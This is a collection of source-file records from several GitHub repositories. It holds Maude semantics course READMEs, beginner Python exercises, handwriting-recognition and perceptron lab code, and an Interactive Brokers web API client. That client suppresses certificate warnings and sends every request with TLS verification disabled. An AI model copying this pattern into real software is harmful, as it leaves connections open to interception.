"blob_id": "004961bfd2ad9a534d25fc96e5647cfd15d6de9a",
"content_id": "8981127ae83525dd2bb7e9924534fb2597721ed2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1805,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 37,
"path": "/HW4/imp/5-imp-locals/6-imp-evaluation-contexts/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------------------------\r\n--- Evaluation contexts: Adding local variables to IMP ---\r\n----------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal reduction semantics\r\nwith evaluation contexts of IMP in Maude to include local variables:\r\n\r\n1) Modify imp-evaluation-contexts.maude: Modify the previous Maude commands\r\n for programs to wrap them in configurations including a state that\r\n initializes all the purposely undeclared variables.\r\n\r\n2) Run imp-evaluation-contexts.maude: No program should completely reduce,\r\n because of the missing semantics for let. The programs will be desugared\r\n and the rewriting of each program should get stuck on a let statement.\r\n\r\n3) Modify imp-split-plug-evaluation-contexts.maude: Add the corresponding\r\n splitting/cooling rule and equation stating that let X = A in S can reduce A.\r\n \r\n4) Modify imp-semantics-evaluation-contexts-x.maude, for each x in {1,2,3}:\r\n a) Add the reduction semantics rule for let.\r\n b) Replace the previous rule for programs with an equation stating that programs\r\n are just statements in the initial state.\r\n\r\n5) Run imp-evaluation-contexts.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Modular and compact\r\n\r\n2) However, the reduction semantics rule for let is very tricky and unorthodox.\r\n In particular, when Sigma is undefined in X, then the assignment following S\r\n in the right hand side of the rule becomes X := undefined, which \"undefines\"\r\n the state in X; this is what we wanted indeed, but it pushes the envelope of\r\n reduction semantics by mixing semantic data (undefined) with syntax.\r\n"
},
{
"alpha_fraction": 0.6407685875892639,
"alphanum_fraction": 0.6457810997962952,
"avg_line_length": 35.40625,
"blob_id": "5b9bcda6a5e2f2b841991e6214e707d0353a6488",
"content_id": "81a2d233ce27de235d43a21dcf1902fccf004d54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1197,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 32,
"path": "/imp/5-imp-locals/5-imp-msos/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------\r\n--- MSOS: Adding local variables to IMP ---\r\n-------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal MSOS\r\nof IMP in Maude to include local variables:\r\n\r\n1) Modify imp-msos.maude: Modify the previous Maude commands for programs\r\n to wrap them in configurations including a state that initializes all\r\n the purposely undeclared variables.\r\n\r\n2) Run imp-msos.maude: No program should be completely reduced, because\r\n of the missing semantics for let. The programs will be desugared and the\r\n rewriting of each program should get stuck on a let statement.\r\n\r\n3) Modify imp-semantics-msos.maude:\r\n a) Add three rules for the MSOS of let.\r\n b) Replace the previous rule for programs with an equation stating that programs\r\n are just statements in the initial state.\r\n\r\n4) Run imp-msos.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\nSame like for SOS:\r\n\r\n1) Modular, though one would expect only two rules, not three, for let.\r\n\r\n2) The second MSOS rule for let is rather tricky.\r\n"
}
] | 42 |
EvanZMercado/lesson-7 | https://github.com/EvanZMercado/lesson-7 | e3fe40d6744a4beb5c6248c25180c0d91bdf9bbe | 549011b2639dd77c3da0333979b7a460d76dd412 | 51b963b09e3683ba799116aa2e3e836ff310693a | refs/heads/master | 2020-04-10T18:25:58.579639 | 2018-12-10T16:29:45 | 2018-12-10T16:29:45 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5982142686843872,
"alphanum_fraction": 0.5982142686843872,
"avg_line_length": 17.83333396911621,
"blob_id": "55c19fd1f67bc849c18e944442e5b7042d52e642",
"content_id": "9f26a07de2d6baa799c0c4c4174dc630dddf5c1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/lesson 7/Probs 2/probs2.py",
"repo_name": "EvanZMercado/lesson-7",
"src_encoding": "UTF-8",
"text": "x = input('Pick a number: ')\nx = int(x)\ny = input('Pick another number: ')\ny = int(y)\ntotal = x + y\nprint(total)"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 15,
"blob_id": "f40aa23a00c68c16f9b944925a4856dc3d68716b",
"content_id": "bf016fb9b4012c9ffc415823c3d7b4a71021ff0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/lesson 7/Probs 3/probs3.py",
"repo_name": "EvanZMercado/lesson-7",
"src_encoding": "UTF-8",
"text": "print('-' * 79)\n\nage = input('How old are you? ')\nage = int(age)\nyearsleft = 100 - age\nanswer = 2018 + yearsleft\nprint(answer)\n\nprint('-' * 79)"
}
] | 2 |
shubham2637/ICR_use | https://github.com/shubham2637/ICR_use | c9d798d6b15135102b8971ebd1bda8cb5e430cb2 | fbeb3037f19fc752a193677339917f6ce333afc4 | b082b182de21065a4d49009361f24987d04748ce | refs/heads/master | 2022-07-15T00:37:01.061771 | 2020-05-06T21:20:39 | 2020-05-06T21:20:39 | 261,715,139 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.560194194316864,
"alphanum_fraction": 0.5883495211601257,
"avg_line_length": 33.33333206176758,
"blob_id": "e80a628bfe0f7808623d7ce9001b308d184367b4",
"content_id": "a234f537d99047d8bebd873291498cd2372f0f38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1030,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 30,
"path": "/ICR.py",
"repo_name": "shubham2637/ICR_use",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport cv2\n\n\ntf.get_logger().setLevel('INFO')\nprint(\"Version: \", tf.version)\nprint(\"Eager mode: \", tf.executing_eagerly())\n#print(\"Hub Version: \", hub.version__)\nprint(\"GPU is\", \"available\" if tf.config.experimental.list_physical_devices(\"GPU\") else \"NOT AVAILABLE\")\n\n\nlabels = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',\n 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\n# loading the ICR model\nnew_model = tf.keras.models.load_model('final_ICR_35_98')\n\nnew_model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n\ndef predictions(image_location):\n img = cv2.imread(image_location)\n grayimage = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n resizeimage = cv2.resize(grayimage, (28, 28))\n imge = resizeimage.reshape(1, 28, 28, 1)\n classes = new_model.predict_classes(imge)\n # print(labels[int(classes)])\n return labels[int(classes)]\n"
}
] | 1 |
mrcabo/NeuralNetworksCI | https://github.com/mrcabo/NeuralNetworksCI | ded0ef2d1f1d3fcb41a498ded6b38b233b85a60a | a9785e14df0d25c887c1ce6a8df3d1ed95d723f4 | de2a15a4beaade9d7359f19466906638ce58f5b2 | refs/heads/master | 2020-04-09T08:31:01.525395 | 2019-01-12T23:43:31 | 2019-01-12T23:43:31 | 160,196,969 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6117969751358032,
"alphanum_fraction": 0.6442615389823914,
"avg_line_length": 32.64615249633789,
"blob_id": "7eea6568517d9e71c16519bac2de29bf45827289",
"content_id": "9dd0bc2d9f424cbc8b82161c8d8412e0563ec290",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2187,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 65,
"path": "/Lab3/lab3_ari.py",
"repo_name": "mrcabo/NeuralNetworksCI",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef gradient(w, sigma_xi, tau, example):\n gradient = (sigma_xi-tau) * (1-np.tanh(np.dot(w,example))**2) * np.sum(example)\n return gradient\n\ndataPath = './Data/'\n\ndata3_xi = np.transpose(np.array(pd.read_csv(dataPath+'data3_xi.csv', header=None)))\ndata3_tau = np.transpose(np.array(pd.read_csv(dataPath+'data3_tau.csv', header=None)))\n\n# P = len(data3_xi)\nP = 100 # number of train examples\nQ = 100 # number of test examples (should be equal to P, or it will blow up as we have it now..)\nN = np.size(data3_xi, 1)\n\n# learning_rate = 0.05\nlearning_rate = 0.05\nt_max = 500 # we have to check which number we put here\n\n# initialize weights as independent random vectors (we initialize the weights as unit vectors)\nmu, variance = 0, 1\nsigma = np.sqrt(variance)\n\n# randomly initialize weights and normalize them\nw1 = np.random.normal(mu, sigma, N)\nw2 = np.random.normal(mu, sigma, N)\nw1 = w1/np.linalg.norm(w1)\nw2 = w2/np.linalg.norm(w2)\n\nE_train = []\nE_test = []\n\nfor t in range(t_max): #these are the epochs\n E_epoch_train = 0.0\n E_epoch_test = 0.0\n indexes = np.random.randint(len(data3_xi), size=(P+Q, 1))\n train_idx = indexes[np.arange(P)]\n test_idx = indexes[np.arange(P, P+Q)]\n for i, idx in enumerate(train_idx):\n example = data3_xi[idx][0] # training example\n sigma_xi = (np.tanh(np.dot(w1, example)) + np.tanh(np.dot(w2, example)))\n e_nu = 0.5*((sigma_xi - data3_tau[idx])**2)\n E_epoch_train += e_nu[0][0]\n\n example_test = data3_xi[test_idx[i]][0] # training example\n sigma_xi_test = (np.tanh(np.dot(w1, example_test)) + np.tanh(np.dot(w2, example_test)))\n e_nu_test = 0.5*((sigma_xi - data3_tau[test_idx[i]])**2)\n E_epoch_test += e_nu_test[0][0]\n\n #recalculate the weights\n w1 = w1 - learning_rate * gradient(w1, sigma_xi, data3_tau[idx], example)\n w2 = w2 - learning_rate * gradient(w2, sigma_xi, data3_tau[idx], example)\n\n E_train.append(E_epoch_train)\n E_test.append(E_epoch_test)\n\nfig = plt.figure()\nax = plt.subplot(111)\nax.plot(np.divide(E_train, P))\nax.plot(np.divide(E_test, Q))\nplt.show()\n"
},
{
"alpha_fraction": 0.548491358757019,
"alphanum_fraction": 0.5705819129943848,
"avg_line_length": 34.00943374633789,
"blob_id": "a1eb81fdc2ab6519ddd045b331c495df623aa020",
"content_id": "56279249630dbe9a9720f44986ba2006f81457c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3712,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 106,
"path": "/Lab3/lab3.py",
"repo_name": "mrcabo/NeuralNetworksCI",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.utils import shuffle\n\n\ndef gradient(w, sigma_xi, tau, example):\n gradient = (sigma_xi-tau) * (1-np.tanh(np.dot(w,example))**2) * np.sum(example)\n return gradient\n\n\ndef findE(xi, tau, w1, w2):\n P = np.size(xi, 0)\n E = 0\n for i, xi_nu in enumerate(xi):\n sigma_xi = (np.tanh(np.dot(w1, xi_nu)) + np.tanh(np.dot(w2, xi_nu)))\n E += (sigma_xi - tau[i]) ** 2\n E = E / (2*P)\n return E\n\n\nif __name__ == \"__main__\":\n\n dataPath = './Data/'\n data3_xi = np.transpose(np.array(pd.read_csv(dataPath+'data3_xi.csv', header=None)))\n data3_tau = np.transpose(np.array(pd.read_csv(dataPath+'data3_tau.csv', header=None)))\n\n n_elem, N = data3_xi.shape\n P = 100 # number of train examples\n Q = 100 # number of test examples\n\n t_max = 300\n\n # initialize weights as independent random vectors (we initialize the weights as unit vectors)\n mu, variance = 0, 1\n sigma = np.sqrt(variance)\n\n E_mean = np.zeros((t_max, 1))\n E_test_mean = np.zeros((t_max, 1))\n n_runs = 10\n np.random.seed(0)\n\n for _ in range(n_runs):\n # Separate our test data from the train data. We previously shuffle it for each run.\n shuffled_data, shuffled_tau = shuffle(data3_xi, data3_tau)\n idx = np.arange(n_elem - Q)\n idx2 = np.arange(n_elem - Q, n_elem)\n train_data_xi = shuffled_data[idx]\n train_data_tau = shuffled_tau[idx]\n test_data_xi = shuffled_data[idx2]\n test_data_tau = shuffled_tau[idx2]\n\n # randomly initialize weights and normalize them\n w1 = np.random.normal(mu, sigma, N)\n w2 = np.random.normal(mu, sigma, N)\n w1 = w1/np.linalg.norm(w1)\n w2 = w2/np.linalg.norm(w2)\n\n E_train = []\n E_test = []\n # learning_rate = 0.5\n learning_rate = 0.05\n\n for _ in range(t_max): # these are the epochs\n # Randomly select P examples for training data\n indexes = np.random.randint(len(train_data_xi), size=P)\n for _, idx in enumerate(indexes):\n xi_nu = train_data_xi[idx] # training example\n sigma_xi = (np.tanh(np.dot(w1, xi_nu)) + np.tanh(np.dot(w2, xi_nu)))\n tau_xi = train_data_tau[idx]\n # Update the weights\n w1 = w1 - learning_rate * gradient(w1, sigma_xi, tau_xi, xi_nu)\n w2 = w2 - learning_rate * gradient(w2, sigma_xi, tau_xi, xi_nu)\n\n # Calculate E and E_test for this epoch.\n E_epoch_train = findE(train_data_xi[indexes], train_data_tau[indexes], w1, w2)\n E_epoch_test = findE(test_data_xi, test_data_tau, w1, w2)\n E_train.append(E_epoch_train)\n E_test.append(E_epoch_test)\n\n # Making learning rate decay with time\n # if learning_rate > 0.001:\n # learning_rate *= 0.975\n # else:\n # learning_rate = 0.001\n\n # We average E and E_test with respect of the number of runs.\n E_mean = np.add(E_mean, np.asarray(E_train))\n E_test_mean = np.add(E_test_mean, np.asarray(E_test))\n\n fig = plt.figure()\n plt.plot(np.divide(E_mean, n_runs))\n plt.plot(np.divide(E_test_mean, n_runs))\n plt.legend([\"E_mean\", \"E_test_mean\"])\n plt.xlabel(\"t\")\n plt.title(r'$\\eta$={}, P={}, Q={}'.format(learning_rate, P, Q))\n fig.savefig('./outputs/E_cost.png')\n plt.show()\n\n fig2 = plt.figure()\n idx = np.arange(np.size(w1))\n rects1 = plt.bar(idx, w1, color='b', label='w1')\n rects2 = plt.bar(idx, w2, color='g', label='w2')\n plt.legend()\n fig2.savefig('./outputs/weights.png')\n plt.show()\n\n"
},
{
"alpha_fraction": 0.5361546277999878,
"alphanum_fraction": 0.5618127584457397,
"avg_line_length": 30.914894104003906,
"blob_id": "d6b10857394b7d510192bb7776a86d1d4eeb1055",
"content_id": "50bf5f0bb258d3ae50e88721da59744e4c42118f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3003,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 94,
"path": "/Lab1/assignment1.py",
"repo_name": "mrcabo/NeuralNetworksCI",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport progressbar\n\n\n# I put it in a function so that we can change the values for alpha easily\ndef experiment(N, n_max, nD, alpha):\n P = int(round(alpha*N)) # number of data points (rounded to closest int)\n mu, variance = 0, 1\n sigma = np.sqrt(variance)\n # theta = -1.0 # to make it inhomogeneous\n data = []\n # generate nD datasets\n for _ in range(nD):\n labels = np.random.binomial(1, 0.5, (P, 1)) # number of trials, probability of each trial\n # result of flipping a coin, tested N times.\n labels[labels < 1] = -1\n S_mu = labels\n xi_mu = np.random.normal(mu, sigma, (P,N))\n # theta_arr = np.full((P, 1), theta)\n # xi_mu = np.concatenate((xi_mu, theta_arr), axis=1)\n data.append([xi_mu, S_mu])\n \n success = perceptron(data, N, P, n_max)\n return success\n\n\ndef perceptron(data, N, P, n_max):\n\n\n success=0\n # repeat training for several randomized datasets\n for i in range(nD):\n # theta = 10.0\n w = np.zeros(len(data[0][0][1])) # initialize the weights as zero\n # w[len(w)-1] = theta\n\n X = data[i][0]\n Y = data[i][1]\n\n # implement sequential perceptron training by cyclic presentation of the P examples\n for epochs in range(n_max): # stop when n > n_max = 100\n done = True\n for j in range(P): # this loop runs the P examples\n E = np.dot(X[j], w)*Y[j] # the local potential\n # we only modify the weights when E<=0. Otherwise they stay the same\n c = 0\n if E <= c:\n w = w + (1/N)*X[j]*Y[j]\n done = False\n if done == True:\n success += 1\n break\n \n return success\n\n\ndef test_runs(n_max, nD, N, alpha, ax):\n success_list = []\n for a in alpha:\n success_list.append(experiment(N, n_max, nD, a))\n\n norm_success = np.divide(np.array(success_list), nD)\n # print('alpha: {}'.format(alpha))\n # print('success_list: {}'.format(success_list))\n # print('norm_success: {}'.format(norm_success))\n\n ax.plot(alpha, norm_success, label='N: {}'.format(N))\n\n\nif __name__ == \"__main__\":\n\n # Run your code in order to study Perceptron training at least for the following parameter settings:\n # N = 20, P = αN with α = 0.75, 1.0, 1.25, . . . 3.0, nD =50, n_max =100\n n_max = 100\n nD = 50\n N_array = [5, 10, 15, 20, 50, 100]\n\n # np.random.seed(0) # To make reproducible sets (if needed)\n\n # determine the value of the fraction of successful runs as a function of alpha=P/N\n alpha = np.arange(0.75, 3.25, 0.25)\n\n fig = plt.figure()\n ax = plt.subplot(111)\n\n for N in progressbar.progressbar(N_array):\n test_runs(n_max, nD, N, alpha, ax)\n\n plt.xlabel(r'$\\alpha = P/N$')\n plt.ylabel(r'$Q_{l.s.}$')\n ax.legend()\n fig.savefig('Lab1/graphs/Q-alpha-graph.png')\n plt.show()\n\n"
},
{
"alpha_fraction": 0.48136645555496216,
"alphanum_fraction": 0.6863353848457336,
"avg_line_length": 15.947368621826172,
"blob_id": "cac9a35cab3e661d12d2aa8d41303abb370d782e",
"content_id": "31e2c39b0e21d810ecc6a34ec320385fb3f9e3cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 19,
"path": "/Lab1/requirements.txt",
"repo_name": "mrcabo/NeuralNetworksCI",
"src_encoding": "UTF-8",
"text": "astroid==2.1.0\ncycler==0.10.0\ngraphviz==0.10.1\nisort==4.3.4\nkiwisolver==1.0.1\nlazy-object-proxy==1.3.1\nmatplotlib==3.0.2\nmccabe==0.6.1\nnumpy==1.15.4\nprogressbar2==3.38.0\npylint==2.2.2\npyparsing==2.3.0\npython-dateutil==2.7.5\npython-utils==2.3.0\nscikit-learn==0.20.1\nscipy==1.1.0\nsix==1.11.0\ntyped-ast==1.1.0\nwrapt==1.10.11\n"
}
] | 4 |
carina28/interactive-broker-python-api | https://github.com/carina28/interactive-broker-python-api | 29688f43eac03c1c5a4487e9cbc27a77ddf94634 | c88bf03226e3a9c2560451d46e1499396661e5ca | 3faec7984648d53b763cf996014c587735fb3127 | refs/heads/master | 2021-01-09T01:53:56.552264 | 2020-02-14T06:51:26 | 2020-02-14T06:51:26 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.736672043800354,
"alphanum_fraction": 0.749596118927002,
"avg_line_length": 30,
"blob_id": "951714ce9f21fb4c7f2d42beef5b67b5b5a7d6bc",
"content_id": "c161b56d41a22d98feaf2ec06ccb1fb92eead4be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 20,
"path": "/test_client.py",
"repo_name": "carina28/interactive-broker-python-api",
"src_encoding": "UTF-8",
"text": "from ibw.client import IBClient\nfrom ibw.configAlex import REGULAR_ACCOUNT, REGULAR_PASSWORD, REGULAR_USERNAME, PAPER_ACCOUNT, PAPER_PASSWORD, PAPER_USERNAME\n\n# Create a new session of the IB Web API.\nib_client = IBClient(username = PAPER_USERNAME, password = PAPER_PASSWORD, account = PAPER_ACCOUNT)\n\n# create a new session.\nib_client.create_session()\n\n# grab the account data.\naccount_data = ib_client.portfolio_accounts()\n\n# print the data.\nprint(account_data)\n\n# Grab historical prices.\naapl_prices = ib_client.market_data_history(conid = ['265598'], period = '1d', bar = '5min')\n\n# print the prices.\nprint(aapl_prices)"
},
{
"alpha_fraction": 0.5912680625915527,
"alphanum_fraction": 0.593711793422699,
"avg_line_length": 33.73602294921875,
"blob_id": "9c30d2cf1d18bbdc1592809100ab67310159189d",
"content_id": "0b3061e7d81b9860b9531f9d9f39cd56a3dcdd85",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33557,
"license_type": "permissive",
"max_line_length": 161,
"num_lines": 966,
"path": "/ibw/client.py",
"repo_name": "carina28/interactive-broker-python-api",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport json\nimport time\nimport pathlib\nimport urllib\nimport requests\nimport subprocess\nimport certifi\nimport urllib3\n\nfrom urllib3.exceptions import InsecureRequestWarning\nurllib3.disable_warnings(category=InsecureRequestWarning)\nhttp = urllib3.PoolManager(cert_reqs='CERT_REQUIRED',ca_certs=certifi.where())\n\nclass IBClient():\n\n\n def __init__(self, username = None, password = None, account = None):\n '''\n Initalizes a new IBClient Object with the username and password of the\n account holder.\n '''\n \n self.ACCOUNT = account\n self.USERNAME = username\n self.PASSWORD = password\n self.CLIENT_PORTAL_FOLDER = pathlib.Path.cwd().joinpath('clientportal.gw').resolve()\n self.API_VERSION = 'v1/'\n self.TESTING_FLAG = False\n self._operating_system = sys.platform\n\n # Define URL Components\n IB_GATEWAY_HOST = r\"https://localhost\"\n IB_GATEWAY_PORT = r\"5000\"\n self.IB_GATEWAY_PATH = IB_GATEWAY_HOST + \":\" + IB_GATEWAY_PORT\n\n def create_session(self):\n '''\n Creates a new session with Interactive Broker using the credentials\n passed through when the Robot was initalized.\n '''\n\n # Assuming the Server is Running, try and grab the Auth Status Endpoint.\n try:\n auth_response = self.is_authenticated()\n except requests.exceptions.SSLError:\n auth_response = False\n except requests.exceptions.ConnectionError:\n auth_response = False\n\n # Scenario 1, Is_Authenticated endpoint return a bad status code so we need to connect again. \n if auth_response == False:\n\n # If it isn't then connect.\n self.connect()\n\n # finall exit the script.\n sys.exit()\n\n # Scenario 2, we got a successful response from the server but we aren't authenticated..\n elif auth_response != False and 'authenticated' not in auth_response.keys():\n\n # Before I can reauthenticate, I need to validate the session.\n self.validate()\n\n # Then reauthenticate.\n self.reauthenticate()\n\n # Then see if we are validated.\n re_auth_response = self.is_authenticated()\n \n # if reauthenticaton was successful then proceed to update accounts.\n if re_auth_response['authenticated'] == True:\n\n # Update the Account for the Session, so it uses the account passed through during initalization.\n update_account_status = self.update_server_account(account_id=self.ACCOUNT)\n\n # if that was successful, then let the User know we are good at this stage and proceed to next step.\n if update_account_status == True:\n print('Session is connected and authenticated and account has been posted to server. Requests will not be limited.')\n return True\n\n # Scenario 3, we got a successful response from the server and we are authenticated.\n elif auth_response != False and 'authenticated' in auth_response.keys() and auth_response['authenticated'] == True:\n\n # To be safe I just validate the session.\n self.validate()\n\n # Then I update the Account for the Session, so it uses the account passed through during initalization.\n update_account_status = self.update_server_account(account_id=self.ACCOUNT)\n\n # if that was successful, then let the User know we are good at this stage and proceed to next step.\n if update_account_status == True:\n print('Session is connected and authenticated and account has been posted to server. Requests will not be limited.')\n return True\n\n # Scenario 3, we got a successful response from the server and we are authenticated.\n elif auth_response != False and 'authenticated' in auth_response.keys() and auth_response['authenticated'] == False:\n\n # To be safe I just validate the session.\n self.validate()\n\n # Then reauthenticate.\n self.reauthenticate()\n\n # Then I update the Account for the Session, so it uses the account passed through during initalization.\n update_account_status = self.update_server_account(account_id=self.ACCOUNT)\n\n # if that was successful, then let the User know we are good at this stage and proceed to next step.\n if update_account_status == True:\n print('Session is connected and authenticated and account has been posted to server. Requests will not be limited.')\n return True\n\n def connect(self):\n\n if self._operating_system == 'win32':\n IB_WEB_API_PROC = [\"cmd\", \"/k\", r\"bin\\run.bat\", r\"root\\conf.yaml\"]\n subprocess.Popen(args = IB_WEB_API_PROC, cwd = self.CLIENT_PORTAL_FOLDER, creationflags = subprocess.CREATE_NEW_CONSOLE)\n elif self._operating_system == 'darwin':\n IB_WEB_API_PROC = [\"open\", \"-F\", \"-a\", \"Terminal\", r\"bin/run.sh\", r\"root/conf.yaml\"]\n subprocess.Popen(args = IB_WEB_API_PROC, cwd = self.CLIENT_PORTAL_FOLDER)\n\n # redirect to the local host auth window.\n self._auth_redirect()\n\n\n def _headers(self, mode = 'json'):\n ''' \n Returns a dictionary of default HTTP headers for calls to TD Ameritrade API,\n in the headers we defined the Authorization and access token.\n\n NAME: mode \n DESC: Defines the content-type for the headers dictionary.\n default is 'json'. Possible values are ['json','form']\n TYPE: String\n '''\n\n if mode == 'json':\n headers = {'Content-Type':'application/json'}\n elif mode == 'form':\n headers = {'Content-Type':'application/x-www-form-urlencoded'}\n\n return headers\n\n\n def _build_url(self, endpoint = None):\n '''\n builds a url for a request.\n\n NAME: endpoint\n DESC: The URL that needs conversion to a full endpoint URL.\n TYPE: String\n\n RTYPE: String\n\n '''\n\n # otherwise build the URL\n return urllib.parse.unquote(urllib.parse.urljoin(self.IB_GATEWAY_PATH, self.API_VERSION) + r'portal/' + endpoint)\n\n\n def _make_request(self, endpoint = None, req_type = None, params = None):\n '''\n Handles all the requests made by the client and correctly organizes\n the information so it is sent correctly. Additionally it will also\n build the URL.\n\n NAME: endpoint\n DESC: The endpoint we wish to request.\n TYPE: String\n\n NAME: type\n DESC: Defines the type of request to be made. Can be one of four\n possible values ['GET','POST','DELETE','PUT']\n TYPE: String\n\n NAME: params\n DESC: Any arguments that are to be sent along in the request. That\n could be parameters of a 'GET' request, or a data payload of a\n 'POST' request.\n TYPE: Dictionary\n \n '''\n\n # first build the url\n url = self._build_url(endpoint = endpoint)\n\n # Scenario 1: POST with a payload.\n if req_type == 'POST'and params is not None:\n \n # make sure it's a JSON String\n headers = self._headers(mode = 'json')\n # headers['accept'] = 'application/json'\n # headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'\n\n # grab the response.\n response = requests.post(url, headers = headers, verify = False, data = json.dumps(params))\n\n # SCENARIO 2: POST without a payload.\n elif req_type == 'POST'and params is None:\n \n # grab the response.\n response = requests.post(url, headers = self._headers(mode = 'json'), verify = False)\n\n # SCENARIO 3: GET without parameters.\n elif req_type == 'GET' and params is None:\n\n # grab the response.\n response = requests.get(url, headers = self._headers(mode = 'json'), verify = False)\n\n # SCENARIO 3: GET with parameters.\n elif req_type == 'GET' and params is not None:\n\n # grab the response.\n headers = self._headers(mode = 'json')\n # headers['accept'] = 'application/json'\n response = requests.get(url, headers = headers, verify = False, params = params)\n\n # grab the status code\n if response.status_code != 200:\n print(response.url)\n print(response.headers)\n print(response.content)\n print(response.status_code)\n \n return response \n\n\n def _auth_redirect(self):\n '''\n Opens a new Browser window with the default one specified by the\n operating system. From there will redirect to the URL that the user \n needs to go to in order to authenticate the newly started session.\n '''\n\n print('\\n')\n print('-'*80)\n print(\"The Interactive Broker server is not currently running, so we cannot authenticate the session.\")\n print(\"The server will startup, and the browser will redirect you to the Local Host you specified in your config file.\")\n print(\"Please login to your account with your username and password and rerun the script to begin the session.\")\n print(\"You'll be redirected in 3 seconds.\")\n print('-'*80)\n print('\\n')\n\n time.sleep(3)\n\n # Redirect to the URL.\n if self._operating_system:\n subprocess.Popen([\"cmd\", \"/k\", \"start\", self.IB_GATEWAY_PATH], shell=False)\n elif self._operating_system:\n subprocess.run([\"open\", self.IB_GATEWAY_PATH], shell=False)\n \n return True\n\n\n def _prepare_arguments_list(self, parameter_list = None):\n '''\n Some endpoints can take multiple values for a parameter, this\n method takes that list and creates a valid string that can be \n used in an API request. The list can have either one index or\n multiple indexes.\n\n NAME: parameter_list\n DESC: A list of paramater values assigned to an argument.\n TYPE: List\n\n EXAMPLE:\n SessionObject.prepare_arguments_list(parameter_list = ['MSFT', 'SQ'])\n\n '''\n\n # validate it's a list.\n if type(parameter_list) is list:\n\n # specify the delimeter and join the list. \n delimeter = ','\n parameter_list = delimeter.join(parameter_list)\n\n return parameter_list\n\n\n '''\n SESSION ENDPOINTS\n '''\n\n\n def validate(self):\n '''\n Validates the current session for the SSO user.\n '''\n\n # define request components\n endpoint = r'sso/validate'\n req_type = 'GET'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n def tickle(self):\n '''\n If the gateway has not received any requests for several minutes an open session will \n automatically timeout. The tickle endpoint pings the server to prevent the \n session from ending.\n '''\n\n # define request components\n endpoint = r'tickle'\n req_type = 'POST'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n def logout(self):\n '''\n Logs the user out of the gateway session. Any further activity requires \n re-authentication.\n '''\n\n # define request components\n endpoint = r'logout'\n req_type = 'POST'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n def reauthenticate(self):\n '''\n Provides a way to reauthenticate to the Brokerage system as long as there \n is a valid SSO session, see /sso/validate.\n '''\n\n # define request components\n endpoint = r'iserver/reauthenticate'\n req_type = 'POST'\n\n # this is special, I don't want the JSON content right away.\n content = self._make_request(endpoint = endpoint, req_type = req_type)\n\n if content.status_code != 200:\n return False\n else:\n return content.json()\n \n\n def is_authenticated(self):\n '''\n Current Authentication status to the Brokerage system. Market Data and \n Trading is not possible if not authenticated, e.g. authenticated \n shows false.\n '''\n\n # define request components\n endpoint = 'iserver/auth/status'\n req_type = 'POST'\n content = self._make_request(endpoint = endpoint, req_type = req_type).json()\n\n return content\n\n\n '''\n MARKET DATA ENDPOINTS\n '''\n\n\n def market_data(self, conids = None, since = None, fields = None):\n '''\n Get Market Data for the given conid(s). 